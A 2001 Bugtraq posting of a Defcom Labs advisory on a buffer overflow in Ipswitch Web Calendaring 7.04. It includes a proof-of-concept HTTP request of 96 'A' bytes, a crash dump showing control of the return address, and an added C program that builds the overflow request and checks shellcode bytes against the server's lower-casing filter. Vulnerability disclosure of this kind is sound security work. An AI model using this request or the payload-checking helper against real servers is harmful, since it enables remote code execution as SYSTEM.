Subject: def-2001-29
Message-ID: <3BC6CE30.8FB31AF3@defcom.com>
Date: Fri, 12 Oct 2001 13:04:16 +0200
From: andreas junestam <andreas.junestam@defcom.com>
To: bugtraq <bugtraq@securityfocus.com>
======================================================================
Defcom Labs Advisory def-2001-29
Ipswitch Web Calendaring 7.04 Buffer Overflow
Author: Andreas Junestam <andreas@defcom.com>
Release Date: 2001-10-12
======================================================================
------------------------=[Brief Description]=-------------------------
When the Web Calendar service (port 8484) receives a request longer than 97
bytes, a buffer overflow occurs that overwrites the saved EBP and the return
address, leaving EIP under the attacker's control.
------------------------=[Affected Systems]=--------------------------
- Ipswitch Web Calendaring 7.04 and possibly earlier versions
----------------------=[Detailed Description]=------------------------
Sending a request whose path consists of 96 'A' bytes:
GET /'A' x 96 HTTP/1.0
generates the following access violation:
Access violation - code c0000005 (first chance)
eax=07777101 ebx=00c338d8 ecx=016f99ec edx=016f99ec esi=0000007e
edi=00000000 eip=61616161 esp=016f99fc ebp=61616161
61616161 ?? ???
The attacker therefore controls the return address and can run code as
SYSTEM. Note that EIP holds 0x61616161 ("aaaa") although the request was
filled with 'A' (0x41): the server runs ToLower over the buffer BEFORE the
overflow occurs, so every byte in the range 0x41-0x5a that the attacker
supplies, in the return address as well as in the shellcode, reaches the
stack as 0x61-0x7a. This limits the instructions that can be used.
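As an added illustration of the ToLower constraint described above (example code written for this page, not Defcom's proof of concept or Ipswitch's code; the function names and the byte-wise ASCII lower-casing are assumptions), the following C program builds the PoC request line, applies the lower-casing the advisory describes, and checks whether a candidate return address or shellcode would survive it unchanged:

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example; not Defcom's or Ipswitch's code. Models the constraint
 * the advisory describes: the request buffer is lower-cased before the
 * overflow, so every byte 'A'..'Z' (0x41..0x5a) in the attacker data
 * reaches the stack as 'a'..'z' (0x61..0x7a). Assumption: plain ASCII
 * lower-casing, one byte at a time, no locale handling. */

/* The transformation the server is described as applying. */
void server_tolower(unsigned char *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (buf[i] >= 'A' && buf[i] <= 'Z')
            buf[i] += 'a' - 'A';
}

/* Number of payload bytes the filter would change. 0 means the payload
 * (return address, NOP sled, shellcode) arrives on the stack unmodified. */
size_t count_mangled(const unsigned char *payload, size_t len)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++)
        if (payload[i] >= 'A' && payload[i] <= 'Z')
            n++;
    return n;
}

/* What a 32-bit value looks like after each of its bytes has been
 * lower-cased; this is why sending 'A's shows up as eip=61616161. */
uint32_t value_after_tolower(uint32_t v)
{
    uint32_t out = 0;
    for (int i = 0; i < 4; i++) {
        unsigned char b = (unsigned char)((v >> (8 * i)) & 0xff);
        server_tolower(&b, 1);
        out |= (uint32_t)b << (8 * i);
    }
    return out;
}

/* Build the PoC request: "GET /" + path_len filler bytes + " HTTP/1.0".
 * Returns the request length, or 0 if `out` is too small. */
size_t build_request(unsigned char *out, size_t outlen,
                     size_t path_len, unsigned char fill)
{
    static const char pre[] = "GET /";
    static const char post[] = " HTTP/1.0\r\n\r\n";
    size_t need = (sizeof pre - 1) + path_len + (sizeof post - 1);
    if (need + 1 > outlen)
        return 0;
    memcpy(out, pre, sizeof pre - 1);
    memset(out + (sizeof pre - 1), fill, path_len);
    memcpy(out + (sizeof pre - 1) + path_len, post, sizeof post - 1);
    out[need] = '\0';
    return need;
}

/* Constructed sample payloads (not from the advisory). */
const unsigned char sample_bad[] = { 0xeb, 0x41, 0x5a, 0x90 };      /* 0x41, 0x5a get mangled */
const unsigned char sample_ok[]  = { 0x90, 0x90, 0x31, 0xc0, 0xcc }; /* nothing in 0x41..0x5a */

int main(void)
{
    unsigned char req[256];
    size_t len = build_request(req, sizeof req, 96, 'A');
    server_tolower(req, len);
    printf("after lower-casing: %.20s...\n", (const char *)req);
    printf("0x41414141 becomes 0x%08x\n",
           (unsigned)value_after_tolower(0x41414141u));
    printf("bad payload: %zu mangled, ok payload: %zu mangled\n",
           count_mangled(sample_bad, sizeof sample_bad),
           count_mangled(sample_ok, sizeof sample_ok));
    return 0;
}
```

A count_mangled() result of zero is the check to run over every byte you intend to place past the overflow point, return address included; 0x41414141 coming back as 0x61616161 is the same effect the register dump above shows in EIP.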
---------------------------=[Workaround]=-----------------------------
Download the new version from:
ftp://ftp.ipswitch.com/Ipswitch/Product_Support/IMail/IM704HF1.exe
-------------------------=[Vendor Response]=--------------------------
This issue was brought to the vendor's attention on the 1st of
October, 2001. A patch has been released.
======================================================================
This release was brought to you by Defcom Labs
http://labs.defcom.com http://www.defcom.com
======================================================================